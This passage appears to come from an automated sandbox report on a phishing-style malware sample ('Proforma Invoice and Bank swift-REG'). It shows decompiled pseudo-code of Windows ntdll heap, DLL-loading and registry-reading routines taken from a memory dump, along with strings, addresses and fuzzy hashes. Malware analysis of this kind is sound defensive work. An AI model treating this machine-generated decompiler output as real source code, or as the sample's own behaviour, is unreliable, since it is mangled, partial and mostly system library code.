					if( *((intOrPtr*)(_t140 + 0x4c)) != 0) {
						 *(_t141 + 3) =  *(_t141 + 1) ^  *(_t141 + 2) ^  *_t141;
						 *_t141 =  *_t141 ^  *(_t140 + 0x50);
					}
					_t135 =  *(_t111 + 0x14);
					if( *(_t111 + 0x14) == 0) {
						L12:
						_t77 =  *((intOrPtr*)(_t141 + 6));
						if(_t77 != 0) {
							_t117 = (_t141 & 0xffff0000) - ((_t77 & 0x000000ff) << 0x10) + 0x10000;
						} else {
							_t117 = _t140;
						}
						_t118 = _t117 + 0x38;
						_t26 = _t111 + 8; // -16
						_t80 = _t26;
						_t136 =  *_t118;
						if( *((intOrPtr*)(_t136 + 4)) != _t118) {
							_push(_t118);
							_push(0);
							E00BAA80D(0, 0xd, _t118,  *((intOrPtr*)(_t136 + 4)));
						} else {
							 *_t80 = _t136;
							 *((intOrPtr*)(_t80 + 4)) = _t118;
							 *((intOrPtr*)(_t136 + 4)) = _t80;
							 *_t118 = _t80;
						}
						_t120 = _v8;
						 *((intOrPtr*)(_t120 + 0x30)) =  *((intOrPtr*)(_t120 + 0x30)) + 1;
						 *((intOrPtr*)(_t120 + 0x2c)) =  *((intOrPtr*)(_t120 + 0x2c)) + ( *(_t111 + 0x14) >> 0xc);
						 *((intOrPtr*)(_t140 + 0x1e8)) =  *((intOrPtr*)(_t140 + 0x1e8)) -  *(_t111 + 0x14);
						 *((intOrPtr*)(_t140 + 0x1f8)) =  *((intOrPtr*)(_t140 + 0x1f8)) + 1;
						if( *((intOrPtr*)(_t140 + 0x1f8)) > 0xa) {
							__eflags =  *(_t140 + 0xb8);
							if( *(_t140 + 0xb8) == 0) {
								_t88 =  *(_t140 + 0x40) & 0x00000003;
								__eflags = _t88 - 2;
								_t121 = _t120 & 0xffffff00 | _t88 == 0x00000002;
								__eflags =  *0xbd8720 & 0x00000001;
								_t89 = _t88 & 0xffffff00 | ( *0xbd8720 & 0x00000001) == 0x00000000;
								__eflags = _t89 & _t121;
								if((_t89 & _t121) != 0) {
									 *(_t140 + 0x48) =  *(_t140 + 0x48) | 0x10000000;
								}
							}
						}
						_t85 =  *(_t111 + 0x14);
						if(_t85 >= 0x7f000) {
							 *((intOrPtr*)(_t140 + 0x1ec)) =  *((intOrPtr*)(_t140 + 0x1ec)) + _t85;
						}
						_t86 = _a16;
						 *_t86 = _t141 - _a12 >> 3;
						return _t86;
					} else {
						_t90 = E00B0B8E4(_t135);
						_t123 =  *((intOrPtr*)(_t90 + 4));
						if( *_t123 != _t90) {
							_push(_t123);
							_push( *_t123);
							E00BAA80D(0, 0xd, _t90, 0);
						} else {
							 *_t111 = _t90;
							 *((intOrPtr*)(_t111 + 4)) = _t123;
							 *_t123 = _t111;
							 *((intOrPtr*)(_t90 + 4)) = _t111;
						}
						_t139 =  *(_t140 + 0xb8);
						if(_t139 != 0) {
							_t93 =  *(_t111 + 0x14) >> 0xc;
							__eflags = _t93;
							while(1) {
								__eflags = _t93 -  *((intOrPtr*)(_t139 + 4));
								if(_t93 <  *((intOrPtr*)(_t139 + 4))) {
									break;
								}
								_t126 =  *_t139;
								__eflags = _t126;
								if(_t126 != 0) {
									_t139 = _t126;
									continue;
								}
								_t93 =  *((intOrPtr*)(_t139 + 4)) - 1;
								__eflags =  *((intOrPtr*)(_t139 + 4)) - 1;
								break;
							}
							E00B0E4A0(_t140, _t139, 0, _t111, _t93,  *(_t111 + 0x14));
						}
						goto L12;
					}
				}
			}

0x00b0b746
0x00b0b74b
0x00b0b74d
0x00b0b750
0x00b0b755
0x00b0b758
0x00b0b758
0x00b0b75e
0x00b0b763
0x00b0b764
0x00b0b76a
0x00b0b76d
0x00b0b771
0x00b0b776
0x00b0b85c
0x00b0b85d
0x00b0b860
0x00b0b865
0x00b52ba1
0x00b52ba2
0x00b52ba9
0x00b52bae
0x00b52bae
0x00b0b77c
0x00b0b77c
0x00b0b77c
0x00b0b785
0x00b0b788
0x00b52bb6
0x00b52bb9
0x00000000
0x00000000
0x00b52bbf
0x00b52bc5
0x00b52bc9
0x00b52be8
0x00b52bed
0x00b52bcb
0x00b52be0
0x00b52be5
0x00b52bf3
0x00b52bf8
0x00b52bfd
0x00b52c05
0x00b52c0e
0x00b52c0e
0x00000000
0x00b0b78e
0x00b0b78e
0x00b0b78e
0x00b0b791
0x00b0b791
0x00b0b797
0x00b0b797
0x00b0b79f
0x00b0b7a9
0x00b0b7af
0x00b0b7af
0x00b0b7b1
0x00b0b7b6
0x00b0b7e2
0x00b0b7e2
0x00b0b7e7
0x00b0b880
0x00b0b7ed
0x00b0b7ed
0x00b0b7ed
0x00b0b7ef
0x00b0b7f2
0x00b0b7f2
0x00b0b7f5
0x00b0b7fa
0x00b52c2d
0x00b52c2e
0x00b52c39
0x00b0b800
0x00b0b800
0x00b0b802
0x00b0b805
0x00b0b808
0x00b0b808
0x00b0b80a
0x00b0b80d
0x00b0b816
0x00b0b81c
0x00b0b822
0x00b0b82f
0x00b0b88b
0x00b0b892
0x00b0b897
0x00b0b899
0x00b0b89b
0x00b0b89e
0x00b0b8a5
0x00b0b8a8
0x00b0b8aa
0x00b0b8ac
0x00b0b8ac
0x00b0b8aa
0x00b0b892
0x00b0b831
0x00b0b839
0x00b0b83b
0x00b0b83b
0x00b0b844
0x00b0b84b
0x00b0b852
0x00b0b7b8
0x00b0b7ba
0x00b0b7bf
0x00b0b7c4
0x00b52c18
0x00b52c19
0x00b52c23
0x00b0b7ca
0x00b0b7ca
0x00b0b7cc
0x00b0b7cf
0x00b0b7d1
0x00b0b7d1
0x00b0b7d4
0x00b0b7dc
0x00b0b8bb
0x00b0b8bb
0x00b0b8be
0x00b0b8be
0x00b0b8c1
0x00000000
0x00000000
0x00b0b8c3
0x00b0b8c5
0x00b0b8c7
0x00b0b8e0
0x00000000
0x00b0b8e0
0x00b0b8cc
0x00b0b8cc
0x00000000
0x00b0b8cc
0x00b0b8d6
0x00b0b8d6
0x00000000
0x00b0b7dc
0x00b0b7b6

Strings

HEAP[%wZ]: , xrefs: 00B52BDB
HEAP: , xrefs: 00B52BE8
((PHEAP_ENTRY)LastKnownEntry <= Entry), xrefs: 00B52BF3

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID:
String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
API String ID: 0-1334570610
Opcode ID: 7ffc9edc9a75d4ac6d32c40938ace379d5b11691f70a79364f5020265cbd6d6f
Instruction ID: ea0f2b2c6de24146f5d6af5a0831e3422e0e76d8318fc4b74e604c829ab6f7d8
Opcode Fuzzy Hash: 7ffc9edc9a75d4ac6d32c40938ace379d5b11691f70a79364f5020265cbd6d6f
Instruction Fuzzy Hash: 2C619F70600341AFDB18DF28C485F6ABBE5FF45314F2485AEE85A8B292D770EC81CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00AF7E41, Relevance: 3.9, Strings: 3, Instructions: 174
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00AF7E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				signed int _t73;
				void* _t77;
				char* _t82;
				char* _t87;
				signed char* _t97;
				signed char _t102;
				intOrPtr _t107;
				signed char* _t108;
				intOrPtr _t112;
				intOrPtr _t124;
				intOrPtr _t125;
				intOrPtr _t126;

				_t107 = __edx;
				_v12 = __ecx;
				_t125 =  *((intOrPtr*)(__ecx + 0x20));
				_t124 = 0;
				_v20 = __edx;
				if(E00AFCEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
					_t112 = _v8;
				} else {
					_t112 = 0;
					_v8 = 0;
				}
				if(_t112 != 0) {
					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
						_t124 = 0xc000007b;
						goto L8;
					}
					_t73 =  *(_t125 + 0x34) | 0x00400000;
					 *(_t125 + 0x34) = _t73;
					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
						goto L3;
					}
					 *(_t125 + 0x34) = _t73 | 0x01000000;
					_t124 = E00AEC9A4( *((intOrPtr*)(_t125 + 0x18)));
					if(_t124 < 0) {
						goto L8;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
						L8:
						return _t124;
					}
					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
							goto L5;
						}
						_t102 =  *0xbd5780; // 0x0
						if((_t102 & 0x00000003) != 0) {
							E00B65510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
							_t102 =  *0xbd5780; // 0x0
						}
						if((_t102 & 0x00000010) != 0) {
							asm("int3");
						}
						_t124 = 0xc0000428;
						goto L8;
					}
					L5:
					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
						goto L8;
					}
					_t77 = _a4 - 0x40000003;
					if(_t77 == 0 || _t77 == 0x33) {
						_v16 =  *((intOrPtr*)(_t125 + 0x18));
						if(E00B07D50() != 0) {
							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						} else {
							_t82 = 0x7ffe0384;
						}
						_t108 = 0x7ffe0385;
						if( *_t82 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E00B07D50() == 0) {
									_t97 = 0x7ffe0385;
								} else {
									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t97 & 0x00000020) != 0) {
									E00B67016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
						}
						if(_a4 != 0x40000003) {
							L14:
							_t126 =  *((intOrPtr*)(_t125 + 0x18));
							if(E00B07D50() != 0) {
								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							} else {
								_t87 = 0x7ffe0384;
							}
							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E00B07D50() != 0) {
									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t108 & 0x00000020) != 0) {
									E00B67016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
							goto L8;
						} else {
							_v16 = _t125 + 0x24;
							_t124 = E00B1A1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
							if(_t124 < 0) {
								E00AEB1E1(_t124, 0x1490, 0, _v16);
								goto L8;
							}
							goto L14;
						}
					} else {
						goto L8;
					}
				}
			}

0x00af7e4c
0x00af7e50
0x00af7e55
0x00af7e58
0x00af7e5d
0x00af7e71
0x00af7f33
0x00af7e77
0x00af7e77
0x00af7e79
0x00af7e79
0x00af7e7e
0x00af7f45
0x00b49848
0x00000000
0x00b49848
0x00af7f4e
0x00af7f53
0x00af7f5a
0x00000000
0x00000000
0x00b4985a
0x00b49862
0x00b49866
0x00000000
0x00b4986c
0x00000000
0x00b4986c
0x00af7e84
0x00af7e84
0x00af7e8d
0x00b49871
0x00af7eb8
0x00af7ec0
0x00af7ec0
0x00af7e9a
0x00b4987e
0x00000000
0x00000000
0x00b49884
0x00b4988b
0x00b498a7
0x00b498ac
0x00b498b1
0x00b498b6
0x00b498b8
0x00b498b8
0x00b498b9
0x00000000
0x00b498b9
0x00af7ea0
0x00af7ea7
0x00000000
0x00000000
0x00af7eac
0x00af7eb1
0x00af7ec6
0x00af7ed0
0x00b498cc
0x00af7ed6
0x00af7ed6
0x00af7ed6
0x00af7ede
0x00af7ee3
0x00b498e3
0x00b498f0
0x00b49902
0x00b498f2
0x00b498fb
0x00b498fb
0x00b49907
0x00b4991d
0x00b4991d
0x00b49907
0x00b498e3
0x00af7ef0
0x00af7f14
0x00af7f14
0x00af7f1e
0x00b49946
0x00af7f24
0x00af7f24
0x00af7f24
0x00af7f2c
0x00b4996a
0x00b49975
0x00b49975
0x00b4997e
0x00b49993
0x00b49993
0x00b4997e
0x00000000
0x00af7ef2
0x00af7efc
0x00af7f0a
0x00af7f0e
0x00b49933
0x00000000
0x00b49933
0x00000000
0x00af7f0e
0x00000000
0x00000000
0x00000000
0x00af7eb1

Strings

Could not validate the crypto signature for DLL %wZ, xrefs: 00B49891
LdrpCompleteMapModule, xrefs: 00B49898
minkernel\ntdll\ldrmap.c, xrefs: 00B498A2

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID:
String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
API String ID: 0-1676968949
Opcode ID: 3e7030cd6ca6194aefd4a1646db6f636ea0634dac903af59f69eef0f8c8d20b2
Instruction ID: 4d6fcb187ab33e8c22983b27eb81748fe67f96ac42f66920136b3d3d8db44d75
Opcode Fuzzy Hash: 3e7030cd6ca6194aefd4a1646db6f636ea0634dac903af59f69eef0f8c8d20b2
Instruction Fuzzy Hash: 5F51CF31A087499BDB21CB9CC944B7ABBE4EF01714F1406EAFA519B2D2DB34EE00D751

Uniqueness

Uniqueness Score: -1.00%

Function 00B923E3, Relevance: 3.9, Strings: 3, Instructions: 166
COMMONCrypto

Download Yara Rule

C-Code - Quality: 64%

			E00B923E3(signed int __ecx, unsigned int __edx) {
				intOrPtr _v8;
				intOrPtr _t42;
				char _t43;
				signed short _t44;
				signed short _t48;
				signed char _t51;
				signed short _t52;
				intOrPtr _t54;
				signed short _t64;
				signed short _t66;
				intOrPtr _t69;
				signed short _t73;
				signed short _t76;
				signed short _t77;
				signed short _t79;
				void* _t83;
				signed int _t84;
				signed int _t85;
				signed char _t94;
				unsigned int _t99;
				unsigned int _t104;
				signed int _t108;
				void* _t110;
				void* _t111;
				unsigned int _t114;

				_t84 = __ecx;
				_push(__ecx);
				_t114 = __edx;
				_t42 =  *((intOrPtr*)(__edx + 7));
				if(_t42 == 1) {
					L49:
					_t43 = 1;
					L50:
					return _t43;
				}
				if(_t42 != 4) {
					if(_t42 >= 0) {
						if( *(__ecx + 0x4c) == 0) {
							_t44 =  *__edx & 0x0000ffff;
						} else {
							_t73 =  *__edx;
							if(( *(__ecx + 0x4c) & _t73) != 0) {
								_t73 = _t73 ^  *(__ecx + 0x50);
							}
							_t44 = _t73 & 0x0000ffff;
						}
					} else {
						_t104 = __edx >> 0x00000003 ^  *__edx ^  *0xbd874c ^ __ecx;
						if(_t104 == 0) {
							_t76 =  *((intOrPtr*)(__edx - (_t104 >> 0xd)));
						} else {
							_t76 = 0;
						}
						_t44 =  *((intOrPtr*)(_t76 + 0x14));
					}
					_t94 =  *((intOrPtr*)(_t114 + 7));
					_t108 = _t44 & 0xffff;
					if(_t94 != 5) {
						if((_t94 & 0x00000040) == 0) {
							if((_t94 & 0x0000003f) == 0x3f) {
								if(_t94 >= 0) {
									if( *(_t84 + 0x4c) == 0) {
										_t48 =  *_t114 & 0x0000ffff;
									} else {
										_t66 =  *_t114;
										if(( *(_t84 + 0x4c) & _t66) != 0) {
											_t66 = _t66 ^  *(_t84 + 0x50);
										}
										_t48 = _t66 & 0x0000ffff;
									}
								} else {
									_t99 = _t114 >> 0x00000003 ^  *_t114 ^  *0xbd874c ^ _t84;
									if(_t99 == 0) {
										_t69 =  *((intOrPtr*)(_t114 - (_t99 >> 0xd)));
									} else {
										_t69 = 0;
									}
									_t48 =  *((intOrPtr*)(_t69 + 0x14));
								}
								_t85 =  *(_t114 + (_t48 & 0xffff) * 8 - 4);
							} else {
								_t85 = _t94 & 0x3f;
							}
						} else {
							_t85 =  *(_t114 + 4 + (_t94 & 0x3f) * 8) & 0x0000ffff;
						}
					} else {
						_t85 =  *(_t84 + 0x54) & 0x0000ffff ^  *(_t114 + 4) & 0x0000ffff;
					}
					_t110 = (_t108 << 3) - _t85;
				} else {
					if( *(__ecx + 0x4c) == 0) {
						_t77 =  *__edx & 0x0000ffff;
					} else {
						_t79 =  *__edx;
						if(( *(__ecx + 0x4c) & _t79) != 0) {
							_t79 = _t79 ^  *(__ecx + 0x50);
						}
						_t77 = _t79 & 0x0000ffff;
					}
					_t110 =  *((intOrPtr*)(_t114 - 8)) - (_t77 & 0x0000ffff);
				}
				_t51 =  *((intOrPtr*)(_t114 + 7));
				if(_t51 != 5) {
					if((_t51 & 0x00000040) == 0) {
						_t52 = 0;
						goto L42;
					}
					_t64 = _t51 & 0x3f;
					goto L38;
				} else {
					_t64 =  *(_t114 + 6) & 0x000000ff;
					L38:
					_t52 = _t64 << 0x00000003 & 0x0000ffff;
					L42:
					_t35 = _t114 + 8; // -16
					_t111 = _t110 + (_t52 & 0x0000ffff);
					_t83 = _t35 + _t111;
					_t54 = E00B3D4F0(_t83, 0xac6c58, 8);
					_v8 = _t54;
					if(_t54 == 8) {
						goto L49;
					}
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E00AEB150();
					} else {
						E00AEB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push(_t111);
					_push(_v8 + _t83);
					E00AEB150("Heap block at %p modified at %p past requested size of %Ix\n", _t114);
					if( *((char*)( *[fs:0x30] + 2)) != 0) {
						 *0xbd6378 = 1;
						asm("int3");
						 *0xbd6378 = 0;
					}
					_t43 = 0;
					goto L50;
				}
			}

0x00b923e3
0x00b923e8
0x00b923eb
0x00b923ee
0x00b923f3
0x00b9259b
0x00b9259b
0x00b9259d
0x00b925a3
0x00b925a3
0x00b923fb
0x00b92424
0x00b9244f
0x00b92460
0x00b92451
0x00b92451
0x00b92456
0x00b92458
0x00b92458
0x00b9245b
0x00b9245b
0x00b92426
0x00b92431
0x00b92436
0x00b92443
0x00b92438
0x00b92438
0x00b92438
0x00b92445
0x00b92445
0x00b92463
0x00b92469
0x00b9246f
0x00b92480
0x00b92495
0x00b924a1
0x00b924ce
0x00b924df
0x00b924d0
0x00b924d0
0x00b924d5
0x00b924d7
0x00b924d7
0x00b924da
0x00b924da
0x00b924a3
0x00b924b0
0x00b924b5
0x00b924c2
0x00b924b7
0x00b924b7
0x00b924b7
0x00b924c4
0x00b924c4
0x00b924e8
0x00b92497
0x00b9249a
0x00b9249a
0x00b92482
0x00b92488
0x00b92488
0x00b92471
0x00b92479
0x00b92479
0x00b924ef
0x00b923fd
0x00b92401
0x00b92412
0x00b92403
0x00b92403
0x00b92408
0x00b9240a
0x00b9240a
0x00b9240d
0x00b9240d
0x00b9241b
0x00b9241b
0x00b924f1
0x00b924f6
0x00b92507
0x00b92510
0x00000000
0x00b92510
0x00b9250b
0x00000000
0x00b924f8
0x00b924f8
0x00b924fc
0x00b92500
0x00b92512
0x00b92515
0x00b9251a
0x00b92521
0x00b92524
0x00b92529
0x00b9252f
0x00000000
0x00000000
0x00b9253c
0x00b9255c
0x00b92561
0x00b9253e
0x00b92554
0x00b92559
0x00b9256a
0x00b9256d
0x00b92574
0x00b92586
0x00b92588
0x00b9258f
0x00b92590
0x00b92590
0x00b92597
0x00000000
0x00b92597

Strings

HEAP[%wZ]: , xrefs: 00B9254F
HEAP: , xrefs: 00B9255C
Heap block at %p modified at %p past requested size of %Ix, xrefs: 00B9256F

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
API String ID: 0-3815128232
Opcode ID: c64f74197087a2c1008e3a32395c41571b49455f5d9516cce657d5cee9160c0b
Instruction ID: dd1d6d3c350a64a5ffb41a5093c51c505810bca0f6dbbabbe456b3932eb701d1
Opcode Fuzzy Hash: c64f74197087a2c1008e3a32395c41571b49455f5d9516cce657d5cee9160c0b
Instruction Fuzzy Hash: 3A514834900250AAEF34DF1AC89577277E1EB58745F6588F9E9C28B382D635DC43EB20

Uniqueness

Uniqueness Score: -1.00%

Function 00AEE620, Relevance: 3.9, Strings: 3, Instructions: 165
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E00AEE620(void* __ecx, short* __edx, short* _a4) {
				char _v16;
				char _v20;
				intOrPtr _v24;
				char* _v28;
				char _v32;
				char _v36;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				void* _v56;
				void* _v60;
				char _v64;
				void* _v68;
				void* _v76;
				void* _v84;
				signed int _t59;
				signed int _t74;
				signed short* _t75;
				signed int _t76;
				signed short* _t78;
				signed int _t83;
				short* _t93;
				signed short* _t94;
				short* _t96;
				void* _t97;
				signed int _t99;
				void* _t101;
				void* _t102;

				_t80 = __ecx;
				_t101 = (_t99 & 0xfffffff8) - 0x34;
				_t96 = __edx;
				_v44 = __edx;
				_t78 = 0;
				_v56 = 0;
				if(__ecx == 0 || __edx == 0) {
					L28:
					_t97 = 0xc000000d;
				} else {
					_t93 = _a4;
					if(_t93 == 0) {
						goto L28;
					}
					_t78 = E00AEF358(__ecx, 0xac);
					if(_t78 == 0) {
						_t97 = 0xc0000017;
						L6:
						if(_v56 != 0) {
							_push(_v56);
							E00B295D0();
						}
						if(_t78 != 0) {
							L00B077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
						}
						return _t97;
					}
					E00B2FA60(_t78, 0, 0x158);
					_v48 = _v48 & 0x00000000;
					_t102 = _t101 + 0xc;
					 *_t96 = 0;
					 *_t93 = 0;
					E00B2BB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
					_v36 = 0x18;
					_v28 =  &_v44;
					_v64 = 0;
					_push( &_v36);
					_push(0x20019);
					_v32 = 0;
					_push( &_v64);
					_v24 = 0x40;
					_v20 = 0;
					_v16 = 0;
					_t97 = E00B29600();
					if(_t97 < 0) {
						goto L6;
					}
					E00B2BB40(0,  &_v36, L"InstallLanguageFallback");
					_push(0);
					_v48 = 4;
					_t97 = L00AEF018(_v64,  &_v44,  &_v56, _t78,  &_v48);
					if(_t97 >= 0) {
						if(_v52 != 1) {
							L17:
							_t97 = 0xc0000001;
							goto L6;
						}
						_t59 =  *_t78 & 0x0000ffff;
						_t94 = _t78;
						_t83 = _t59;
						if(_t59 == 0) {
							L19:
							if(_t83 == 0) {
								L23:
								E00B2BB40(_t83, _t102 + 0x24, _t78);
								if(L00AF43C0( &_v48,  &_v64) == 0) {
									goto L17;
								}
								_t84 = _v48;
								 *_v48 = _v56;
								if( *_t94 != 0) {
									E00B2BB40(_t84, _t102 + 0x24, _t94);
									if(L00AF43C0( &_v48,  &_v64) != 0) {
										 *_a4 = _v56;
									} else {
										_t97 = 0xc0000001;
										 *_v48 = 0;
									}
								}
								goto L6;
							}
							_t83 = _t83 & 0x0000ffff;
							while(_t83 == 0x20) {
								_t94 =  &(_t94[1]);
								_t74 =  *_t94 & 0x0000ffff;
								_t83 = _t74;
								if(_t74 != 0) {
									continue;
								}
								goto L23;
							}
							goto L23;
						} else {
							goto L14;
						}
						while(1) {
							L14:
							_t27 =  &(_t94[1]); // 0x2
							_t75 = _t27;
							if(_t83 == 0x2c) {
								break;
							}
							_t94 = _t75;
							_t76 =  *_t94 & 0x0000ffff;
							_t83 = _t76;
							if(_t76 != 0) {
								continue;
							}
							goto L23;
						}
						 *_t94 = 0;
						_t94 = _t75;
						_t83 =  *_t75 & 0x0000ffff;
						goto L19;
					}
				}
			}

0x00aee620
0x00aee628
0x00aee62f
0x00aee631
0x00aee635
0x00aee637
0x00aee63e
0x00b45503
0x00b45503
0x00aee64c
0x00aee64c
0x00aee651
0x00000000
0x00000000
0x00aee661
0x00aee665
0x00b4542a
0x00aee715
0x00aee71a
0x00aee71c
0x00aee720
0x00aee720
0x00aee727
0x00aee736
0x00aee736
0x00aee743
0x00aee743
0x00aee673
0x00aee678
0x00aee67d
0x00aee682
0x00aee685
0x00aee692
0x00aee69b
0x00aee6a3
0x00aee6ad
0x00aee6b1
0x00aee6b2
0x00aee6bb
0x00aee6bf
0x00aee6c0
0x00aee6c8
0x00aee6cc
0x00aee6d5
0x00aee6d9
0x00000000
0x00000000
0x00aee6e5
0x00aee6ea
0x00aee6f9
0x00aee70b
0x00aee70f
0x00b45439
0x00b4545e
0x00b4545e
0x00000000
0x00b4545e
0x00b4543b
0x00b4543e
0x00b45440
0x00b45445
0x00b45472
0x00b45475
0x00b4548d
0x00b45493
0x00b454a9
0x00000000
0x00000000
0x00b454ab
0x00b454b4
0x00b454bc
0x00b454c8
0x00b454de
0x00b454fb
0x00b454e0
0x00b454e6
0x00b454eb
0x00b454eb
0x00b454de
0x00000000
0x00b454bc
0x00b45477
0x00b4547a
0x00b45480
0x00b45483
0x00b45486
0x00b4548b
0x00000000
0x00000000
0x00000000
0x00b4548b
0x00000000
0x00000000
0x00000000
0x00000000
0x00b45447
0x00b45447
0x00b45447
0x00b45447
0x00b4544e
0x00000000
0x00000000
0x00b45450
0x00b45452
0x00b45455
0x00b4545a
0x00000000
0x00000000
0x00000000
0x00b4545c
0x00b4546a
0x00b4546d
0x00b4546f
0x00000000
0x00b4546f
0x00aee70f

Strings

InstallLanguageFallback, xrefs: 00AEE6DB
@, xrefs: 00AEE6C0
\Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 00AEE68C

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID:
String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
API String ID: 0-1757540487
Opcode ID: c7dcc1c268611f4d110233118eeba74af78b00b6dcb3f995292394aa2d5838bb
Instruction ID: 23b7b47167e001b21788a144bb100bb0f7bfe65bf35d2f30254046c731a876e0
Opcode Fuzzy Hash: c7dcc1c268611f4d110233118eeba74af78b00b6dcb3f995292394aa2d5838bb
Instruction Fuzzy Hash: 9851CD72508B559BC724DF64C440AABB3E8FF88714F0509AEF989DB241FB34DE4487A2

Uniqueness

Uniqueness Score: -1.00%

Function 00B0B8E4, Relevance: 3.8, Strings: 3, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E00B0B8E4(unsigned int __edx) {
				void* __ecx;
				void* __edi;
				intOrPtr* _t16;
				intOrPtr _t18;
				void* _t27;
				void* _t28;
				unsigned int _t30;
				intOrPtr* _t31;
				unsigned int _t38;
				void* _t39;
				unsigned int _t40;

				_t40 = __edx;
				_t39 = _t28;
				if( *0xbd8748 >= 1) {
					__eflags = (__edx + 0x00000fff & 0xfffff000) - __edx;
					if((__edx + 0x00000fff & 0xfffff000) != __edx) {
						_t18 =  *[fs:0x30];
						__eflags =  *(_t18 + 0xc);
						if( *(_t18 + 0xc) == 0) {
							_push("HEAP: ");
							E00AEB150();
						} else {
							E00AEB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push("(ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)");
						E00AEB150();
						__eflags =  *0xbd7bc8;
						if(__eflags == 0) {
							E00BA2073(_t27, 1, _t39, __eflags);
						}
					}
				}
				_t38 =  *(_t39 + 0xb8);
				if(_t38 != 0) {
					_t13 = _t40 >> 0xc;
					__eflags = _t13;
					while(1) {
						__eflags = _t13 -  *((intOrPtr*)(_t38 + 4));
						if(_t13 <  *((intOrPtr*)(_t38 + 4))) {
							break;
						}
						_t30 =  *_t38;
						__eflags = _t30;
						if(_t30 != 0) {
							_t38 = _t30;
							continue;
						}
						_t13 =  *((intOrPtr*)(_t38 + 4)) - 1;
						__eflags =  *((intOrPtr*)(_t38 + 4)) - 1;
						break;
					}
					return E00B0AB40(_t39, _t38, 0, _t13, _t40);
				} else {
					_t31 = _t39 + 0x8c;
					_t16 =  *_t31;
					while(_t31 != _t16) {
						__eflags =  *((intOrPtr*)(_t16 + 0x14)) - _t40;
						if( *((intOrPtr*)(_t16 + 0x14)) >= _t40) {
							return _t16;
						}
						_t16 =  *_t16;
					}
					return _t31;
				}
			}

0x00b0b8f0
0x00b0b8f2
0x00b0b8f4
0x00b52c4e
0x00b52c50
0x00b52c56
0x00b52c5c
0x00b52c60
0x00b52c7f
0x00b52c84
0x00b52c62
0x00b52c77
0x00b52c7c
0x00b52c8a
0x00b52c8f
0x00b52c94
0x00b52c9c
0x00b52ca5
0x00b52ca5
0x00b52c9c
0x00b52c50
0x00b0b8fa
0x00b0b902
0x00b0b921
0x00b0b921
0x00b0b924
0x00b0b924
0x00b0b927
0x00000000
0x00000000
0x00b0b929
0x00b0b92b
0x00b0b92d
0x00b0b940
0x00000000
0x00b0b940
0x00b0b932
0x00b0b932
0x00000000
0x00b0b932
0x00000000
0x00b0b904
0x00b0b904
0x00b0b90a
0x00b0b90c
0x00b0b916
0x00b0b919
0x00b0b915
0x00b0b915
